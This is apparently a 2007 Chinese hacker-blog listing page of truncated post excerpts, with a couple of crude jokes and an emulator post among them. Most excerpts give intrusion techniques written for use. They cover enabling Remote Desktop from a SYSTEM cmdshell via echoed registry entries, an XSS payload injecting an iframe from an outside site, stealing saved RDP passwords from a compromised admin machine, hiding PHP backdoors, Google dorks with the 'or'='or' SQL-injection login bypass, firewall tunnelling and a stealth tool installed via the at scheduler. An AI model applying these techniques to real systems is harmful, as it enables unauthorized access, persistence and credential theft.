2007-07-16 03:36
今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,xp,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务。
一、win 2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curre |
2007-06-28 17:25
跨站漏洞成功演示代码:
[font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.godx.cn%27%3E%3C/iframe%3E')))]God[/font]
对策。。。屏蔽关键字
如果不用屏蔽关键字的办法, 则使用下面的办法修补漏洞
用记事本打开 guestbook.asp
查找
|
2007-06-28 17:22
几天前费了不少力气拿到一管理员机器,主站我盘旋了很久,没有突破口,开了80,还有一个高端端口,当然就是3389了,一阵欣喜,管理员一定会登这个服务器的3389的。
现在机器是拿到了,翻了翻管理员机器里的东西,本来想装键盘记录的,发现有很多以ip命名的rdp文件,下了一个下回来打开看了一下,真幸运,保存了密码在rdp文件里的(这种情况只有读rdp的密码了,键盘记录记不到)。主站和各分站的3389都是以保存密码登录的,上传一个读取rdp密码的东西就可以读到密码了,但这时遇到一个很头痛的问题,我 |
2007-05-22 16:08
幼儿园里,女老师在教大家学习英文字母
让孩子们跟她一起读 A B C D……
发现一个同学不读,老师很好奇,就问她,
“XX同学,你为什么不跟老师一起读呢”
那同学回答说
“老师,我妈妈说——B,是骂人的话”
老师一本正经的给她解释:
“噢,你妈的B 和老师的B是两个不同的B”
又补充了一句:
“你妈的B是用来骂人的,老师的B是给外国人用的”
------------ |
2007-05-22 15:42
一派出所民警在值班,忽然,电话铃声响起。抓起话筒,那头传来一老太太焦急的声音:“你是xx派出所吗?”“是的,请问您有什么需要帮忙的吗?”民警是刚分过来的,对工作认真负责。“我……我的两万掉下水道里了,怎么也捞不着。”虽然算不得一桩大事,但两万元也确实不是一个小数目。何况所领导交待:要急民众之所急。想到这,民警骑了一辆警用摩托车就急匆匆地赶到出事地点——那是一个居民区的小巷子,几个老太太围着一张桌子,桌子上还摆着麻将牌。
民警问: |
2007-05-21 22:45
作者:lis0
来源:lis0's Blog
PS:很巧妙的一个方法..
测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2
最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出 |
2007-05-21 16:48
1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,
关键字:Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都 |
2007-05-21 16:37
来源:安全信息网
不少公司的防火墙作了较为严格的限制,以至于很多网络服务如QQ、MSN都无法运行,如果你还能够打开网页,那么,使用Http通道软件可以让你突破限制,可以在现有的网络条件中使用任何网络服务。
使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对方通讯,当封装的数据包到 |
2007-05-19 16:31
我比较喜欢玩模拟器,我这里还有一些其他的模拟器和2G多的ROM,可惜没办法提供下载。
不多做介绍,特别是80年代后的朋友肯定会喜欢这个帖子...电脑玩累了打一盘俄罗斯方块或者超级马力轻松一下...此版本非原创...但也是我多年搜集的经典游戏...希望老鸟们会喜欢...这个模拟器是中文版本,也支持手柄...其他的设置很简单自己研究
每每玩起这些游戏,就象回到了童年...感动~~大家enjoy~~~
 |
2007-05-19 16:25
文章作者:教主
信息来源:邪恶八进制
功能介绍:
无进程.无服务.无连接.无启动项.无端口.无注册表项
运行环境:
只能安装在win2003上.
安装方式:
远程3389下安装必须使用计划任务. at 方式.其他远程控制方式双击就可以了
注:有些人说为什么大小不一样.我可以告诉大家 。 绝版王子拿到的版本是我机器之前实验捆绑式代码的时候,里面的附加程序upx.exe被感染了.我想既然都泄露了。我把upx替换新的编译给大家.避免大家中那个捆绑式感染的实验测试程序。
|
|
|
|
加为好友
送他礼物
发送消息
